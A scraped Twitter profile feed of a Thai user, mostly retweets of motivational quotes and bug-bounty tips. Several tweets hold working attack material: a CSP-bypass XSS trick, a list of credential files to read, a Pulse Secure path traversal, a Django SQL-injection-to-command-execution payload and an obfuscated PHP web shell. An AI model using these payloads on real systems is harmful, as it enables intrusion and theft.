Lui

@enwuft

Thailand
Vrijeme pridruživanja: studeni 2016.
Rođen/a 2000.

Tweetovi

Blokirali ste korisnika/cu @enwuft

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @enwuft

  1. Prikvačeni tweet
    6. kol 2019.

    "You have to believe you can accomplish something because once you believe that, you're half way to actually doing something".

    Poništi
  2. proslijedio/la je Tweet
    22. sij

    New blog post: A Less Known Attack Vector, Second Order IDOR Attacks

    Poništi
  3. proslijedio/la je Tweet
    8. sij

    If a mentally unstable highschool dropout without degrees can get a job at Microsoft, anyone can achieve their dreams. Just got to keep going at it, even if you go half crazy.

    Poništi
  4. proslijedio/la je Tweet

    Found HTML Injection in a web form but the CSP was blocking execution. I noticed *.google.com was allowed which is common for Google Analytics. Hosted an xss.js payload on Google Drive and found the raw download link. Passed that in to the script src location and💥! CSP Bypass.

    Prikaži ovu nit
    Poništi
  5. 21. pro 2019.

    คุณมีความสามารถ คุณทำอะไรก็ได้ อย่างเช่นไปดูหมีขั่วโลก

    Poništi
  6. proslijedio/la je Tweet

    Wow, this is unbelievable! I share this great honour with everyone in the movement and climate activists everywhere.

    Poništi
  7. proslijedio/la je Tweet
    1. pro 2019.
    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet

    Maximise the Payout Check Directories - /proc/mounts /proc/net/arp /etc/motd /etc/mysql/my.cnf /proc/net/route /proc/sched_debug /proc/self/environ /home/$USER/.bash_history /home/$USER/.ssh/id_rsa /var/run/secrets/kubernetes.io/serviceaccount /proc/self/cwd/index.php

    Poništi
  9. proslijedio/la je Tweet
    21. kol 2019.

    File disclosure in Pulse Secure SSL VPN, 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4. Cc inurl:/dana-na/ filetype:cgi /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/

    Poništi
  10. proslijedio/la je Tweet
    16. kol 2019.

    OWASP Amass Fact: If you use the '-include' flag to reduce sources during your enum, be sure to include one or more of the following for ASN info: networksdb, radb, robtex, shadowserver, teamcymru and/or umbrella

    Poništi
  11. proslijedio/la je Tweet
    12. kol 2019.

    Pre-auth RCE on Fortinet and Pulse Secure (prior: Juniper) SSL VPN's by and - over 500k such VPN's on the internet. Heap overflow, arbitrary file read, plaintext passwords, magic backdoor, command injection... Defcon slides:

    Poništi
  12. proslijedio/la je Tweet
    12. kol 2019.

    Exploit vulnerabilities in Android media parsers? Stagefright decoders? That's old, everyone did that. Instead, let's attack the hardware decoders! Great work by

    Poništi
  13. proslijedio/la je Tweet
    11. kol 2019.
    Poništi
  14. proslijedio/la je Tweet
    10. kol 2019.
    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    7. kol 2019.

    EXP for CVE-2019-14234 Django JSONField SQL Injection Step1: ?data__breed'%3f'a') OR 1%3d2 %3bCREATE table cmd_exec(cmd_output text) -- OR .... Step2: ?data__breed'%3f'a') OR 1%3d2 %3bCOPY cmd_exec FROM PROGRAM 'ping ' -- OR ...

    Prikaži ovu nit
    Poništi
  16. proslijedio/la je Tweet
    7. kol 2019.

    <?php (error_reporting(0)).($_[0][]=@$_GET["\x30"]). ($_[1][]="\x73").($_[1][]="\x79").($_[1][]="\x73\x74"). ($_[1][]="\x65\x6D").($l=@get_defined_vars()['_'][1]).($´.=$l[0]).($´.=$l[1]).($´.=$l[2]).($´.=$l[3]).(($´("{$_[0][0]}")).exit); Exec: curl-v'http://sv/x.php?0=id;uname'

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    6. kol 2019.
    Poništi
  18. proslijedio/la je Tweet
    25. srp 2019.
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·